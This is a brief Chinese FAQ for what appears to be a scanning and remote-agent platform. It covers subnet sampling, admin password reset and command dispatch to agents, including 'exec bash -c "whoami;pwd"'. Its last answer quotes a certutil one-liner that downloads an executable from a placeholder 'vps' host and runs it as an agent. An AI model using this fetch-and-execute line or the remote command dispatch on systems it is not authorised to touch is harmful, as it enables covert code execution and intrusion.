Skip to content

常见问题

1. 扫描任务中的C段IP地址随机扫描选项是什么作用

C段IP地址随机扫描,这个功能的含义是开启了这个后,C 段地址范围会随机选择20 个 IP去扫描。

掩码长度少于等于16会强制开启。比如,我下发的目标 10.0.0.0/16 段,他这个有6万多个IP,这个IP太多了,费时间, 去扫描的时候那么只会扫描256*20 ,大概5千多个IP.

这样可以较为快速的发现C段地址

2. 如何重置管理员密码

下面命令将admin密码修改为123456

以linux 平台为例

./nserver_linux_amd64.exe resetpass -p 123456

3. 命令下发功能命令参数带空格怎么办

如果参数中有空格请使用双引号包裹。

4. 命令下发功能如何执行多条系统命令

exec 命令每次只允许一个程序,可以使用bash -c来执行多条命令。 如下会执行whoamipwd命令

exec bash -c "whoami;pwd"

5. 一句话启动Agent失败怎么办

举例在监听器看到的命令如下:

certutil -urlcache -gmt -split -f http://vps/d/izdkjhzy izdkjhzy.exe && izdkjhzy.exe agent -u http://vps -s xxxx

可以通过浏览器下载 -f 参数指定的url, 然后再修改文件名后缀为exe, 再通过cmd 执行 && 后面的语句。